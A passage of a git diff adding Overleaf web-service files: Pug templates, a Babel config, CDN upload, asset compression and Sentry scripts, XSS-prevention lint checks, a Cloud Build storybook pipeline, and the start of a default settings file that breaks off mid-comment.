main.content.content-alt#subscription-manage-group-root diff --git a/services/web/app/views/user_membership/new.pug b/services/web/app/views/user_membership/new.pug new file mode 100644 index 0000000..6a88249 --- /dev/null +++ b/services/web/app/views/user_membership/new.pug @@ -0,0 +1,23 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-10.col-md-offset-1 + h3 #{entityName} "#{entityId}" does not exists in v2 + form( + data-ol-regular-form + method='post', + action='' + ) + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-primary.text-capitalize( + type="submit", + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") Create #{entityName} in v2 + span(hidden data-ol-inflight="pending") #{translate("creating")}… diff --git a/services/web/app/views/user_membership/publisher-managers-react.pug b/services/web/app/views/user_membership/publisher-managers-react.pug new file mode 100644 index 0000000..793bdf9 --- /dev/null +++ b/services/web/app/views/user_membership/publisher-managers-react.pug @@ -0,0 +1,12 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/publisher-managers' + +block append meta + meta(name="ol-users", data-type="json", content=users) + meta(name="ol-groupId", data-type="string", content=groupId) + meta(name="ol-groupName", data-type="string", content=name) + +block content + main.content.content-alt#subscription-manage-group-root diff --git a/services/web/babel.config.json b/services/web/babel.config.json new file mode 100644 index 0000000..9bb4c73 --- /dev/null +++ b/services/web/babel.config.json @@ -0,0 +1,43 @@ +{ + "compact": false, + "presets": [ + [ + "@babel/env", + { + "useBuiltIns": "usage", + // This version must be aligned with the `core-js` version in `package.json` + "corejs": { "version": "3.38" }, + "exclude": [ + // Exclude Array.prototype.push polyfill, as it's not needed and affects performance in Chrome + "es.array.push", + // Exclude objectSpread polyfill, as it's not needed and affects performance + "@babel/plugin-transform-object-rest-spread", + // Exclude _defineProperty polyfill, as it causes a bug without the objectSpread polyfill + "@babel/plugin-transform-computed-properties", + // Use native async functions, for performance + "@babel/plugin-transform-async-to-generator", + // Use native generators, for performance + "@babel/plugin-transform-regenerator", + // Use native async generators, for performance + "@babel/plugin-transform-async-generator-functions", + // Use native for-of loops, for performance + "@babel/plugin-transform-for-of" + ] + } + ], + ["@babel/react", { "runtime": "automatic" }], + "@babel/typescript" + ], + "plugins": ["macros"], + "overrides": [ + // treat .cjs files (e.g. 
libraries symlinked into node_modules) as commonjs + { + "test": "../../**/*.cjs", + "sourceType": "script" + }, + { + "test": "../../libraries/overleaf-editor-core/**/*.js", + "sourceType": "script" + } + ] +} diff --git a/services/web/bin/cdn_upload b/services/web/bin/cdn_upload new file mode 100755 index 0000000..52281e4 --- /dev/null +++ b/services/web/bin/cdn_upload @@ -0,0 +1,73 @@ +#!/bin/bash +set -eEu + +function upload_into_bucket() { + bucket=$1 + + # stylesheets + bin/cdn_upload_batch 'text/css' "$bucket" '.css' \ + -x '.+(?<!\.css)$' & + + # javascript files + bin/cdn_upload_batch 'application/javascript' "$bucket" '.js' \ + -x '.+(?<!\.js)$' & + + # the rest + bin/cdn_upload_batch '-' "$bucket" '-' \ + -x '.+\.(css|js)$' & + + wait +} + +verify_upload_into_bucket() { + local bucket + local missing_from_bucket + bucket=$1 + printf '\nINFO: Verifying file availability in %s.\n' "$bucket" + readarray -t missing_from_bucket < <( + comm -13 \ + <(gsutil ls "${bucket}/public/**" | sed "s@${bucket}/@@" | sort) \ + <(find /tmp/public /tmp/compressed -type f | sed ' + # Remove absolute path prefix + s@^/tmp/@@; + # Undo the compressed/ directory separation that does not exist in the bucket + s@^compressed/@@ + ' | sort) + ) + if [[ ${#missing_from_bucket[@]} -eq 0 ]]; then + printf 'INFO: Verification successful: all local files have been found in bucket %s.\n' \ + "$bucket" + else + printf >&2 'WARN: %d local file(s) not available in bucket %s:\n' \ + ${#missing_from_bucket[@]} "$bucket" + printf >&2 ' - %s\n' "${missing_from_bucket[@]}" + return 1 + fi +} + +# Upload to staging CDN if branch is either 'main' or 'staging-main' +if [[ "$BRANCH_NAME" == "main" ]] || [[ "$BRANCH_NAME" == "staging-main" ]]; then + tar --directory=/tmp/ -xf build.tar + + # delete source maps + find /tmp/public -name '*.js.map' -delete + + bin/compress_assets + + upload_into_bucket "$CDN_STAG" && + verify_upload_into_bucket "$CDN_STAG" || exit 3 & + pid_staging=$! # record pid of the detached process "upload && verify || exit 3") + + pid_production= + # Only upload to production CDN if branch is + if [[ "$BRANCH_NAME" == "main" ]]; then + upload_into_bucket "$CDN_PROD" && + verify_upload_into_bucket "$CDN_PROD" || exit 4 & + pid_production=$! # record pid of the detached process "upload && verify || exit 4") + fi + + wait "$pid_staging" # wait for staging upload to finish, wait(1) will exit if the upload failed + if [[ -n "$pid_production" ]]; then + wait "$pid_production" # wait for production upload to finish (if started), wait(1) will exit if the upload failed + fi +fi diff --git a/services/web/bin/cdn_upload_batch b/services/web/bin/cdn_upload_batch new file mode 100755 index 0000000..606e2a9 --- /dev/null +++ b/services/web/bin/cdn_upload_batch @@ -0,0 +1,47 @@ +#!/bin/bash +set -e + +content_type=$1 +bucket=$2 +text_extension=$3 +shift 3 +content_type_options="" +if [[ "$content_type" != "-" ]]; then + content_type_options="-h Content-Type:${content_type};charset=utf-8" +fi + +# DOCS for gsutil -- it does not have long command line flags! +## global flags +# -h NAME:VALUE add header, can occur multiples times +# -m upload with multiple threads +## rsync flags +# -c use checksums for determining changed files (mtime is not stable) +# -r traverse into directories recursively +# -x Python regex for excluding files from the sync +if [[ "$text_extension" == "-" || $(find /tmp/public -type f -name "*$text_extension" | wc -l) != "0" ]]; then + # Potentially skip upload of non-compressed .js/.css files. 
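+  # For example: invoked as cdn_upload_batch 'text/css' "$bucket" '.css' -x '.+(?<!\.css)$',
+  # the forwarded -x regex excludes every object that does not end in .css, so
+  # this pass uploads only the uncompressed stylesheets from /tmp/public.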
+ # shellcheck disable=SC2086 + gsutil \ + -h "Cache-Control:public, max-age=31536000" \ + ${content_type_options} \ + -m \ + rsync \ + -c \ + -r \ + "$@" \ + "/tmp/public/" \ + "${bucket}/public/" +fi + +# shellcheck disable=SC2086 +gsutil \ + -h "Cache-Control:public, max-age=31536000" \ + -h "Content-Encoding:gzip" \ + ${content_type_options} \ + -m \ + rsync \ + -c \ + -r \ + "$@" \ + "/tmp/compressed/public/" \ + "${bucket}/public/" diff --git a/services/web/bin/check_extracted_translations b/services/web/bin/check_extracted_translations new file mode 100755 index 0000000..569af5c --- /dev/null +++ b/services/web/bin/check_extracted_translations @@ -0,0 +1,24 @@ +#!/bin/bash + +set -e + +# Ensure all locales used in the frontend are tracked +OUTPUT=data/dumpFolder/i18next-scanner +trap 'rm -rf "$OUTPUT"' EXIT +npx i18next-scanner --output "$OUTPUT" +ACTUAL=frontend/extracted-translations.json +EXPECTED="$OUTPUT/frontend/extracted-translations.json" +if ! diff "$ACTUAL" "$EXPECTED"; then + cat <<MSG >&2 + +services/web/frontend/extracted-translations.json is not up-to-date. + +--- +Try running: + + internal$ bin/run web npm run extract-translations + +--- +MSG + exit 1 +fi diff --git a/services/web/bin/compress_assets b/services/web/bin/compress_assets new file mode 100755 index 0000000..e50f0a3 --- /dev/null +++ b/services/web/bin/compress_assets @@ -0,0 +1,14 @@ +#!/usr/bin/env bash +set -e -o pipefail + +SCRIPT_PATH=$(realpath "${BASH_SOURCE[0]}") +SCRIPT_DIR=$(dirname "$SCRIPT_PATH") + +pushd /tmp + +find public/ -type d | sed 's!^!compressed/!' | xargs mkdir --parents + +find public/ -type f -print0 \ +| xargs --null --max-args 20 --max-procs 10 "$SCRIPT_DIR/compress_batch_of_assets" + +popd diff --git a/services/web/bin/compress_batch_of_assets b/services/web/bin/compress_batch_of_assets new file mode 100755 index 0000000..4a650da --- /dev/null +++ b/services/web/bin/compress_batch_of_assets @@ -0,0 +1,16 @@ +#!/usr/bin/env bash +set -e + +for file in "$@"; do + file_gzipped="compressed/$file" + + gzip -9 --no-name --stdout "$file" > "$file_gzipped" + + before=$(stat -c%s "$file") + after=$(stat -c%s "$file_gzipped") + if [[ "$after" -ge "$before" ]]; then + rm "$file_gzipped" + else + rm "$file" + fi +done diff --git a/services/web/bin/copy_external_pages b/services/web/bin/copy_external_pages new file mode 100755 index 0000000..c025379 --- /dev/null +++ b/services/web/bin/copy_external_pages @@ -0,0 +1,6 @@ +#!/bin/bash +set -e + +# Branding +mv app/views/external/robots.txt public/robots.txt +mv app/views/external/googlebdb0f8f7f4a17241.html public/googlebdb0f8f7f4a17241.html diff --git a/services/web/bin/lint_flag_res_send_usage b/services/web/bin/lint_flag_res_send_usage new file mode 100755 index 0000000..9931071 --- /dev/null +++ b/services/web/bin/lint_flag_res_send_usage @@ -0,0 +1,47 @@ +#!/bin/bash + +set -e + +POTENTIAL_SEND_USAGE=$(\ + grep \ + --files-with-matches \ + --recursive \ + app.mjs \ + app/ \ + modules/*/app \ + test/acceptance/ \ + modules/*/test/acceptance/ \ + --regex "\.send\b" \ + --regex "\bsend(" \ +) +HELPER_MODULE="app/src/infrastructure/Response.js" +if [[ "$POTENTIAL_SEND_USAGE" == "$HELPER_MODULE" ]]; then + exit 0 +fi + +for file in ${POTENTIAL_SEND_USAGE}; do + if [[ "$file" == "$HELPER_MODULE" ]]; then + continue + fi + + cat <<MSG >&2 + +ERROR: $file contains a potential use of 'res.send'. + +--- +$(grep -n -C 3 "$file" --regex "\.send\b" --regex "\bsend(") +--- + +Using 'res.send' is prone to introducing XSS vulnerabilities. 
+ +Consider using 'res.json' or one of the helpers in $HELPER_MODULE. + +If this is a false-positive, consider using a more specific name than 'send' + for your newly introduced function. + +Links: + - https://github.com/overleaf/internal/issues/6268 + +MSG + exit 1 +done diff --git a/services/web/bin/lint_locales b/services/web/bin/lint_locales new file mode 100755 index 0000000..eceefe0 --- /dev/null +++ b/services/web/bin/lint_locales @@ -0,0 +1,43 @@ +#!/bin/bash + +set -e + +# Ensure all locale files are sorted. +node scripts/translations/sort.js --check + +# Ensure all locales are still in use +node scripts/translations/cleanupUnusedLocales.js --check + +# Ensure all locales use the same variables +node scripts/translations/checkVariables.js --ignore-orphaned-translations + +# Ensure no locales contain single quotes. +LOCALES_WITH_SINGLE_QUOTE=$(\ + grep \ + --files-with-matches \ + --recursive locales/ \ + --regex "'" \ + || true +) + +for file in ${LOCALES_WITH_SINGLE_QUOTE}; do + cat <<MSG >&2 + +ERROR: $file contains a locale with a single quote. + +--- +$(grep "$file" --regex "'") +--- + +Using single quotes in locales can lead to Angular XSS. + +You will need to replace the quote with a similar looking character. +’ (\u2019) is a good candidate. + +Links: + - https://en.wikipedia.org/wiki/Right_single_quotation_mark + - https://github.com/overleaf/issues/issues/4478 + +MSG + exit 1 +done diff --git a/services/web/bin/lint_pug_templates b/services/web/bin/lint_pug_templates new file mode 100755 index 0000000..6f255d9 --- /dev/null +++ b/services/web/bin/lint_pug_templates @@ -0,0 +1,31 @@ +#!/bin/sh + +set -e + +TEMPLATES_EXTENDING_META_BLOCK=$(\ + grep \ + --files-with-matches \ + --recursive app/views modules/*/app/views \ + --regex 'block append meta' \ + --regex 'block prepend meta' \ + --regex 'append meta' \ + --regex 'prepend meta' \ +) + +for file in ${TEMPLATES_EXTENDING_META_BLOCK}; do + if ! grep "$file" --quiet --extended-regexp -e 'extends .+layout'; then + cat <<MSG >&2 + +ERROR: $file is a partial template and extends 'block meta'. + +Using block append/prepend in a partial will duplicate the block contents into + the <body> due to a bug in pug. +Putting meta tags in the <body> can lead to Angular XSS. + +You will need to refactor the partial and move the block into the top level + page template that extends the global layout.pug. + +MSG + exit 1 + fi +done diff --git a/services/web/bin/push-translations-changes.sh b/services/web/bin/push-translations-changes.sh new file mode 100755 index 0000000..ba24757 --- /dev/null +++ b/services/web/bin/push-translations-changes.sh @@ -0,0 +1,18 @@ +#!/bin/bash +set -e + +SCRIPT_PATH=$(realpath "${BASH_SOURCE[0]}") +SCRIPT_DIR=$(dirname "$SCRIPT_PATH") +WEB_DIR=$(dirname "$SCRIPT_DIR") + +cd "$WEB_DIR" + +if [[ $(git status --porcelain=2 locales/) ]]; then + git add locales/* + git commit -m "auto update translation" + # Switch the cloudbuild clone from https to ssh authentication. + git remote set-url --push origin git@github.com:overleaf/internal.git + git push origin "HEAD:$BRANCH_NAME" +else + echo 'No changes' +fi diff --git a/services/web/bin/routes b/services/web/bin/routes new file mode 100755 index 0000000..707a5da --- /dev/null +++ b/services/web/bin/routes @@ -0,0 +1,134 @@ +#! 
/usr/bin/env node + +const acorn = require('acorn') +const acornWalk = require('acorn-walk') +const fs = require('fs') +const _ = require('lodash') +const glob = require('glob') +const escodegen = require('escodegen') +const print = console.log + +const Methods = new Set([ + 'get', + 'head', + 'post', + 'put', + 'delete', + 'connect', + 'options', + 'trace', + 'patch', +]) + +const isMethod = str => { + return Methods.has(str) +} + +// Check if the expression is a call on a router, return data about it, or null +const routerCall = callExpression => { + const callee = callExpression.callee + const property = callee.property + const args = callExpression.arguments + if (!callee.object || !callee.object.name) { + return false + } + const routerName = callee.object.name + if ( + // Match known names for the Express routers: app, webRouter, whateverRouter, etc... + isMethod(property.name) && + (routerName === 'app' || routerName.match('^.*[rR]outer$')) + ) { + return { + routerName, + method: property.name, + args, + } + } else { + return null + } +} + +const formatMethodCall = expression => { + return escodegen.generate(expression, { format: { compact: true } }) +} + +const parseAndPrintRoutesSync = path => { + const content = fs.readFileSync(path) + // Walk the AST (Abstract Syntax Tree) + acornWalk.simple( + acorn.parse(content, { sourceType: 'module', ecmaVersion: 2020 }), + { + // We only care about call expression ( like `a.b()` ) + CallExpression(node) { + const call = routerCall(node) + if (call) { + const firstArg = _.first(call.args) + try { + print( + ` ${formatRouterName(call.routerName)}\t .${call.method} \t: ${ + firstArg.value + } => ${call.args.slice(1).map(formatMethodCall).join(' => ')}` + ) + } catch (e) { + print('>> Error') + print(e) + print(JSON.stringify(call)) + process.exit(1) + } + } + }, + } + ) +} + +const routerNameMapping = { + privateApiRouter: 'privateApi', + publicApiRouter: 'publicApi', +} +const formatRouterName = name => { + return routerNameMapping[name] || name +} + +const main = () => { + // Take an optional filter to apply to file names + const filter = process.argv[2] || null + + if (filter && (filter === '--help' || filter === 'help')) { + print('') + print(' Usage: bin/routes [filter]') + print(' Examples:') + print(' bin/routes') + print(' bin/routes GitBridge') + print('') + process.exit(0) + } + + // Find all routers + glob('*[rR]outer.*js', { matchBase: true }, (err, files) => { + if (err) { + console.error(err) + process.exit(1) + } + for (const file of files) { + if (file.match('^node_modules.*$') || file.match('.*/public/.*')) { + continue + } + // Restrict to the filter (if filter is present) + if (filter && !file.match(`.*${filter}.*`)) { + continue + } + print(`[${file}]`) + try { + parseAndPrintRoutesSync(file) + } catch (_e) { + print('>> Error parsing file') + continue + } + } + process.exit(0) + }) +} + +if (require.main === module) { + main() +} diff --git a/services/web/bin/run b/services/web/bin/run new file mode 100755 index 0000000..f0af921 --- /dev/null +++ b/services/web/bin/run @@ -0,0 +1,8 @@ +#!/bin/bash + +pushd .. +bin/run "$*" +RV=$? 
+popd || exit 1 + +exit $RV diff --git a/services/web/bin/sentry_upload b/services/web/bin/sentry_upload new file mode 100755 index 0000000..ad19a6c --- /dev/null +++ b/services/web/bin/sentry_upload @@ -0,0 +1,18 @@ +#!/bin/sh +set -e + +if [[ "$BRANCH_NAME" == "master" || "$BRANCH_NAME" == "main" ]]; then + rm -rf sentry_upload + mkdir sentry_upload + tar --directory sentry_upload -xf build.tar + cd sentry_upload/public + + SENTRY_RELEASE=${COMMIT_SHA} + sentry-cli releases new "$SENTRY_RELEASE" + sentry-cli releases set-commits --auto "$SENTRY_RELEASE" + sentry-cli sourcemaps upload --release="$SENTRY_RELEASE" . + sentry-cli releases finalize "$SENTRY_RELEASE" + + cd ../.. + rm -rf sentry_upload +fi diff --git a/services/web/cloudbuild-storybook-index.html.m4 b/services/web/cloudbuild-storybook-index.html.m4 new file mode 100644 index 0000000..b7845c3 --- /dev/null +++ b/services/web/cloudbuild-storybook-index.html.m4 @@ -0,0 +1,78 @@ +divert(`-1') +define(`foreach', `pushdef(`$1')_foreach($@)popdef(`$1')') +define(`_arg1', `$1') +define(`_foreach', `ifelse(`$2', `()', `', + `define(`$1', _arg1$2)$3`'$0(`$1', (shift$2), `$3')')') +divert`'dnl +<html lang="en"> + <head> + <meta charset="utf-8"> + <title>Overleaf Storybook builds + + + + +

+    Overleaf Storybook builds
+
+    Branches:
+
+    foreach(DIR, (LIST),
+      • DIR/ (GitHub)
+    )
    + + Last updated on syscmd(date)dnl + for ifdef(`BRANCH_NAME',BRANCH_NAME,unknown branch) + (build history). + + + diff --git a/services/web/cloudbuild-storybook.yaml b/services/web/cloudbuild-storybook.yaml new file mode 100644 index 0000000..ac9cfeb --- /dev/null +++ b/services/web/cloudbuild-storybook.yaml @@ -0,0 +1,70 @@ +steps: + - id: npm_ci + name: "node:20.18.2" + entrypoint: /bin/bash + args: + - '-c' + - 'bin/npm_install_subset . libraries/* services/web' + + - id: build-storybook + name: 'node:20.18.2' + env: + - 'BRANCH_NAME=$BRANCH_NAME' + - 'BUILD_ID=$BUILD_ID' + script: | + #!/bin/bash + set -e + make -C services/web BRANCH_NAME="${BRANCH_NAME:-$BUILD_ID}" build_storybook + + - id: deploy-storybook + name: 'gcr.io/google.com/cloudsdktool/cloud-sdk' + env: + - 'BRANCH_NAME=$BRANCH_NAME' + - 'BUILD_ID=$BUILD_ID' + - 'BUCKET=gs://overleaf-dev-storybook' + dir: services/web + script: | + #!/bin/bash + : ${BRANCH_NAME:=$BUILD_ID} + [[ "$BRANCH_NAME" ]] || { + echo 1>&2 "ERROR: BRANCH_NAME not set" + exit 2 + } + gsutil -m copy -r storybook-output/* "${BUCKET}/" + waitFor: + - build-storybook + + - id: read-storybook-bucket + name: 'gcr.io/google.com/cloudsdktool/cloud-sdk' + dir: services/web + env: + - 'BUCKET=gs://overleaf-dev-storybook' + script: | + #!/bin/bash + set -ex + gsutil ls "${BUCKET}/" \ + | sed -E "s@^${BUCKET}/([^/]+)/@\1@" \ + > storybook-bucket-listing.txt + waitFor: + - deploy-storybook + + - id: create-storybook-index + name: 'node:20.18.2' + dir: services/web + env: + - 'BRANCH_NAME=$BRANCH_NAME' + script: | + #!/bin/bash + set -ex + LIST=$(tr '\n' , < storybook-bucket-listing.txt) + m4 -DLIST="$LIST" -DBRANCH_NAME="$BRANCH_NAME" cloudbuild-storybook-index.html.m4 > storybook-index.html + waitFor: + - read-storybook-bucket + + - id: update-storybook-index + name: 'gcr.io/google.com/cloudsdktool/cloud-sdk' + dir: services/web + entrypoint: 'gsutil' + args: [ "copy", "storybook-index.html", "gs://overleaf-dev-storybook/index.html" ] + waitFor: + - create-storybook-index diff --git a/services/web/config/settings.defaults.js b/services/web/config/settings.defaults.js new file mode 100644 index 0000000..be567bf --- /dev/null +++ b/services/web/config/settings.defaults.js @@ -0,0 +1,1037 @@ +const Path = require('path') +const { merge } = require('@overleaf/settings/merge') + +let defaultFeatures, siteUrl + +// Make time interval config easier. 
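+// e.g. '5 * minutes' (used for wiki.maxCacheAge below) is 300000 ms.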
+const seconds = 1000 +const minutes = 60 * seconds + +// These credentials are used for authenticating api requests +// between services that may need to go over public channels +const httpAuthUser = process.env.WEB_API_USER +const httpAuthPass = process.env.WEB_API_PASSWORD +const httpAuthUsers = {} +if (httpAuthUser && httpAuthPass) { + httpAuthUsers[httpAuthUser] = httpAuthPass +} + +const intFromEnv = function (name, defaultValue) { + if ( + [null, undefined].includes(defaultValue) || + typeof defaultValue !== 'number' + ) { + throw new Error( + `Bad default integer value for setting: ${name}, ${defaultValue}` + ) + } + return parseInt(process.env[name], 10) || defaultValue +} + +const defaultTextExtensions = [ + 'tex', + 'latex', + 'sty', + 'cls', + 'bst', + 'bib', + 'bibtex', + 'txt', + 'tikz', + 'mtx', + 'rtex', + 'md', + 'asy', + 'lbx', + 'bbx', + 'cbx', + 'm', + 'lco', + 'dtx', + 'ins', + 'ist', + 'def', + 'clo', + 'ldf', + 'rmd', + 'lua', + 'gv', + 'mf', + 'yml', + 'yaml', + 'lhs', + 'mk', + 'xmpdata', + 'cfg', + 'rnw', + 'ltx', + 'inc', +] + +const parseTextExtensions = function (extensions) { + if (extensions) { + return extensions.split(',').map(ext => ext.trim()) + } else { + return [] + } +} + +const httpPermissionsPolicy = { + blocked: [ + 'accelerometer', + 'attribution-reporting', + 'browsing-topics', + 'camera', + 'display-capture', + 'encrypted-media', + 'gamepad', + 'geolocation', + 'gyroscope', + 'hid', + 'identity-credentials-get', + 'idle-detection', + 'local-fonts', + 'magnetometer', + 'microphone', + 'midi', + 'otp-credentials', + 'payment', + 'picture-in-picture', + 'screen-wake-lock', + 'serial', + 'storage-access', + 'usb', + 'window-management', + 'xr-spatial-tracking', + ], + allowed: { + autoplay: 'self "https://videos.ctfassets.net"', + fullscreen: 'self', + }, +} + +module.exports = { + env: 'server-ce', + + limits: { + httpGlobalAgentMaxSockets: 300, + httpsGlobalAgentMaxSockets: 300, + }, + + allowAnonymousReadAndWriteSharing: + process.env.OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING === 'true', + + // Databases + // --------- + mongo: { + options: { + appname: 'web', + maxPoolSize: parseInt(process.env.MONGO_POOL_SIZE, 10) || 100, + serverSelectionTimeoutMS: + parseInt(process.env.MONGO_SERVER_SELECTION_TIMEOUT, 10) || 60000, + // Setting socketTimeoutMS to 0 means no timeout + socketTimeoutMS: parseInt( + process.env.MONGO_SOCKET_TIMEOUT ?? 
'60000', + 10 + ), + monitorCommands: true, + }, + url: + process.env.MONGO_CONNECTION_STRING || + process.env.MONGO_URL || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + hasSecondaries: process.env.MONGO_HAS_SECONDARIES === 'true', + }, + + redis: { + web: { + host: process.env.REDIS_HOST || '127.0.0.1', + port: process.env.REDIS_PORT || '6379', + password: process.env.REDIS_PASSWORD || '', + db: process.env.REDIS_DB, + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + }, + + // websessions: + // cluster: [ + // {host: '127.0.0.1', port: 7000} + // {host: '127.0.0.1', port: 7001} + // {host: '127.0.0.1', port: 7002} + // {host: '127.0.0.1', port: 7003} + // {host: '127.0.0.1', port: 7004} + // {host: '127.0.0.1', port: 7005} + // ] + + // ratelimiter: + // cluster: [ + // {host: '127.0.0.1', port: 7000} + // {host: '127.0.0.1', port: 7001} + // {host: '127.0.0.1', port: 7002} + // {host: '127.0.0.1', port: 7003} + // {host: '127.0.0.1', port: 7004} + // {host: '127.0.0.1', port: 7005} + // ] + + // cooldown: + // cluster: [ + // {host: '127.0.0.1', port: 7000} + // {host: '127.0.0.1', port: 7001} + // {host: '127.0.0.1', port: 7002} + // {host: '127.0.0.1', port: 7003} + // {host: '127.0.0.1', port: 7004} + // {host: '127.0.0.1', port: 7005} + // ] + + api: { + host: process.env.REDIS_HOST || '127.0.0.1', + port: process.env.REDIS_PORT || '6379', + password: process.env.REDIS_PASSWORD || '', + maxRetriesPerRequest: parseInt( + process.env.REDIS_MAX_RETRIES_PER_REQUEST || '20' + ), + }, + }, + + // Service locations + // ----------------- + + // Configure which ports to run each service on. Generally you + // can leave these as they are unless you have some other services + // running which conflict, or want to run the web process on port 80. + internal: { + web: { + port: process.env.WEB_PORT || 3000, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + // Tell each service where to find the other services. If everything + // is running locally then this is easy, but they exist as separate config + // options incase you want to run some services on remote hosts. 
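+  // For example, setting DOCUPDATER_HOST=docupdater.internal makes this web
+  // service call http://docupdater.internal:3003 via apis.documentupdater.url.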
+ apis: { + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || '127.0.0.1' + }:${process.env.WEB_API_PORT || process.env.WEB_PORT || 3000}`, + user: httpAuthUser, + pass: httpAuthPass, + }, + documentupdater: { + url: `http://${ + process.env.DOCUPDATER_HOST || + process.env.DOCUMENT_UPDATER_HOST || + '127.0.0.1' + }:3003`, + }, + docstore: { + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016`, + pubUrl: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016`, + }, + chat: { + internal_url: `http://${process.env.CHAT_HOST || '127.0.0.1'}:3010`, + }, + filestore: { + url: `http://${process.env.FILESTORE_HOST || '127.0.0.1'}:3009`, + }, + clsi: { + url: `http://${process.env.CLSI_HOST || '127.0.0.1'}:3013`, + // url: "http://#{process.env['CLSI_LB_HOST']}:3014" + backendGroupName: undefined, + submissionBackendClass: + process.env.CLSI_SUBMISSION_BACKEND_CLASS || 'n2d', + }, + clsiCache: { + instances: JSON.parse(process.env.CLSI_CACHE_INSTANCES || '[]'), + }, + project_history: { + sendProjectStructureOps: true, + url: `http://${process.env.PROJECT_HISTORY_HOST || '127.0.0.1'}:3054`, + }, + historyBackupDeletion: { + enabled: false, + url: `http://${process.env.HISTORY_BACKUP_DELETION_HOST || '127.0.0.1'}:3101`, + user: process.env.HISTORY_BACKUP_DELETION_USER || 'staging', + pass: process.env.HISTORY_BACKUP_DELETION_PASS, + }, + realTime: { + url: `http://${process.env.REALTIME_HOST || '127.0.0.1'}:3026`, + }, + contacts: { + url: `http://${process.env.CONTACTS_HOST || '127.0.0.1'}:3036`, + }, + notifications: { + url: `http://${process.env.NOTIFICATIONS_HOST || '127.0.0.1'}:3042`, + }, + webpack: { + url: `http://${process.env.WEBPACK_HOST || '127.0.0.1'}:3808`, + }, + wiki: { + url: process.env.WIKI_URL || 'https://learn.sharelatex.com', + maxCacheAge: parseInt(process.env.WIKI_MAX_CACHE_AGE || 5 * minutes, 10), + }, + + haveIBeenPwned: { + enabled: process.env.HAVE_I_BEEN_PWNED_ENABLED === 'true', + url: + process.env.HAVE_I_BEEN_PWNED_URL || 'https://api.pwnedpasswords.com', + timeout: parseInt(process.env.HAVE_I_BEEN_PWNED_TIMEOUT, 10) || 5 * 1000, + }, + v1_history: { + url: + process.env.V1_HISTORY_URL || + `http://${process.env.V1_HISTORY_HOST || '127.0.0.1'}:${ + process.env.V1_HISTORY_PORT || '3100' + }/api`, + urlForGitBridge: process.env.V1_HISTORY_URL_FOR_GIT_BRIDGE, + user: process.env.V1_HISTORY_USER || 'staging', + pass: + process.env.V1_HISTORY_PASS || + process.env.V1_HISTORY_PASSWORD || + 'password', + + buckets: { + globalBlobs: process.env.OVERLEAF_EDITOR_BLOBS_BUCKET, + projectBlobs: process.env.OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET, + }, + }, + + // For legacy reasons, we need to populate the below objects. + v1: {}, + recurly: {}, + }, + + // Defines which features are allowed in the + // Permissions-Policy HTTP header + httpPermissions: httpPermissionsPolicy, + useHttpPermissionsPolicy: true, + + jwt: { + key: process.env.OT_JWT_AUTH_KEY, + algorithm: process.env.OT_JWT_AUTH_ALG || 'HS256', + }, + + devToolbar: { + enabled: false, + }, + + splitTests: [], + + // Where your instance of Overleaf Community Edition/Server Pro can be found publicly. Used in emails + // that are sent out, generated links, etc. 
+ siteUrl: (siteUrl = process.env.PUBLIC_URL || 'http://127.0.0.1:3000'), + + lockManager: { + lockTestInterval: intFromEnv('LOCK_MANAGER_LOCK_TEST_INTERVAL', 50), + maxTestInterval: intFromEnv('LOCK_MANAGER_MAX_TEST_INTERVAL', 1000), + maxLockWaitTime: intFromEnv('LOCK_MANAGER_MAX_LOCK_WAIT_TIME', 10000), + redisLockExpiry: intFromEnv('LOCK_MANAGER_REDIS_LOCK_EXPIRY', 30), + slowExecutionThreshold: intFromEnv( + 'LOCK_MANAGER_SLOW_EXECUTION_THRESHOLD', + 5000 + ), + }, + + // Optional separate location for websocket connections, if unset defaults to siteUrl. + wsUrl: process.env.WEBSOCKET_URL, + wsUrlV2: process.env.WEBSOCKET_URL_V2, + wsUrlBeta: process.env.WEBSOCKET_URL_BETA, + + wsUrlV2Percentage: parseInt( + process.env.WEBSOCKET_URL_V2_PERCENTAGE || '0', + 10 + ), + wsRetryHandshake: parseInt(process.env.WEBSOCKET_RETRY_HANDSHAKE || '5', 10), + + // cookie domain + // use full domain for cookies to only be accessible from that domain, + // replace subdomain with dot to have them accessible on all subdomains + cookieDomain: process.env.COOKIE_DOMAIN, + cookieName: process.env.COOKIE_NAME || 'overleaf.sid', + cookieRollingSession: true, + + // this is only used if cookies are used for clsi backend + // clsiCookieKey: "clsiserver" + + robotsNoindex: process.env.ROBOTS_NOINDEX === 'true' || false, + + maxEntitiesPerProject: parseInt( + process.env.MAX_ENTITIES_PER_PROJECT || '2000', + 10 + ), + + projectUploadTimeout: parseInt( + process.env.PROJECT_UPLOAD_TIMEOUT || '120000', + 10 + ), + maxUploadSize: 50 * 1024 * 1024, // 50 MB + multerOptions: { + preservePath: process.env.MULTER_PRESERVE_PATH, + }, + + // start failing the health check if active handles exceeds this limit + maxActiveHandles: process.env.MAX_ACTIVE_HANDLES + ? parseInt(process.env.MAX_ACTIVE_HANDLES, 10) + : undefined, + + // Security + // -------- + security: { + sessionSecret: process.env.SESSION_SECRET, + sessionSecretUpcoming: process.env.SESSION_SECRET_UPCOMING, + sessionSecretFallback: process.env.SESSION_SECRET_FALLBACK, + bcryptRounds: parseInt(process.env.BCRYPT_ROUNDS, 10) || 12, + }, // number of rounds used to hash user passwords (raised to power 2) + + adminUrl: process.env.ADMIN_URL, + adminOnlyLogin: process.env.ADMIN_ONLY_LOGIN === 'true', + adminPrivilegeAvailable: process.env.ADMIN_PRIVILEGE_AVAILABLE === 'true', + blockCrossOriginRequests: process.env.BLOCK_CROSS_ORIGIN_REQUESTS === 'true', + allowedOrigins: (process.env.ALLOWED_ORIGINS || siteUrl).split(','), + + httpAuthUsers, + + // Default features + // ---------------- + // + // You can select the 